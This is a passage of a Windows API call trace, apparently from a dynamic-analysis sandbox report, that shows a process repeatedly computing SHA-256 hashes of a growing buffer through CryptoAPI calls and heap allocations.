	[0196.965] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.966] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.966] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0196.966] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.966] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b648
	[0196.966] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230b648, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b648, pdwDataLen=0x128aac) returned 1
	[0196.966] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.966] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.966] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.966] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.966] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0196.966] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.966] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b670
	[0196.966] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230b670, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b670, pdwDataLen=0x128aac) returned 1
	[0196.966] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.967] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.967] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.967] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.967] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0196.967] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.967] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b698
	[0196.967] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230b698, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b698, pdwDataLen=0x128aac) returned 1
	[0196.967] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.967] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.967] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.967] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.967] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0196.967] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.967] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b6c0
	[0196.967] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230b6c0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b6c0, pdwDataLen=0x128aac) returned 1
	[0196.967] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.967] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.968] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.968] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.968] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0196.968] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.968] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b6e8
	[0196.968] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230b6e8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b6e8, pdwDataLen=0x128aac) returned 1
	[0196.968] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.968] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.968] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.968] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.968] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x620, dwFlags=0x0) returned 1
	[0196.968] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.968] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b710
	[0196.968] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230b710, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b710, pdwDataLen=0x128aac) returned 1
	[0196.968] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.968] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.969] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.969] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.969] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0196.969] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.969] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b738
	[0196.969] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230b738, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b738, pdwDataLen=0x128aac) returned 1
	[0196.969] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.969] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.969] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.969] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.969] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0196.969] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.969] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b760
	[0196.969] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230b760, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b760, pdwDataLen=0x128aac) returned 1
	[0196.969] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.969] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.969] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.970] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.970] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0196.970] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.970] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b788
	[0196.970] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230b788, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b788, pdwDataLen=0x128aac) returned 1
	[0196.970] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.970] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.970] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.970] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.970] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0196.970] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.970] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b7b0
	[0196.970] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230b7b0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b7b0, pdwDataLen=0x128aac) returned 1
	[0196.970] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.970] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.970] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.971] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.971] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0196.971] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.971] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b7d8
	[0196.971] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230b7d8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b7d8, pdwDataLen=0x128aac) returned 1
	[0196.971] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.971] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.971] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.972] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.972] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x6e0, dwFlags=0x0) returned 1
	[0196.972] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.972] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b800
	[0196.972] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230b800, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b800, pdwDataLen=0x128aac) returned 1
	[0196.972] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.972] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.972] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.972] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.972] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0196.972] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.972] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b828
	[0196.972] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230b828, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b828, pdwDataLen=0x128aac) returned 1
	[0196.972] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.972] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.972] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.973] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.973] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x720, dwFlags=0x0) returned 1
	[0196.973] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.973] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b850
	[0196.973] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230b850, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b850, pdwDataLen=0x128aac) returned 1
	[0196.973] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.973] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.973] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.973] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.973] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0196.973] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.973] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b878
	[0196.973] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230b878, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b878, pdwDataLen=0x128aac) returned 1
	[0196.973] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.973] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.973] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.974] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.974] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0196.974] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.974] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b8a0
	[0196.974] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230b8a0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b8a0, pdwDataLen=0x128aac) returned 1
	[0196.974] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.974] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.974] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.974] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.974] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0196.974] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.974] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b8c8
	[0196.974] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230b8c8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b8c8, pdwDataLen=0x128aac) returned 1
	[0196.974] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.974] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.974] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.975] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.975] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0196.975] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.975] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b8f0
	[0196.975] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230b8f0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b8f0, pdwDataLen=0x128aac) returned 1
	[0196.975] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.975] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.975] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.975] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.975] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0196.975] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.975] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b918
	[0196.975] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230b918, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b918, pdwDataLen=0x128aac) returned 1
	[0196.975] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.975] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.975] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.976] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.976] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x7e0, dwFlags=0x0) returned 1
	[0196.976] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.976] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b940
	[0196.976] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230b940, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b940, pdwDataLen=0x128aac) returned 1
	[0196.976] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.976] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.976] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.976] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.976] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0196.976] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.976] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b968
	[0196.976] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230b968, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b968, pdwDataLen=0x128aac) returned 1
	[0196.976] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.976] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.976] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.977] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.977] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0196.977] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.977] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b990
	[0196.977] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230b990, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b990, pdwDataLen=0x128aac) returned 1
	[0196.977] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.977] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.977] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.977] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.977] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0196.977] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.977] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b9b8
	[0196.977] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230b9b8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b9b8, pdwDataLen=0x128aac) returned 1
	[0196.977] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.977] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.977] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.978] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.978] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0196.978] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.978] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230b9e0
	[0196.978] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230b9e0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230b9e0, pdwDataLen=0x128aac) returned 1
	[0196.978] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.978] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.978] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.979] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.979] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0196.979] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.979] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230ba08
	[0196.979] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230ba08, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230ba08, pdwDataLen=0x128aac) returned 1
	[0196.979] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.979] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.979] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.979] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.979] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0x8a0, dwFlags=0x0) returned 1
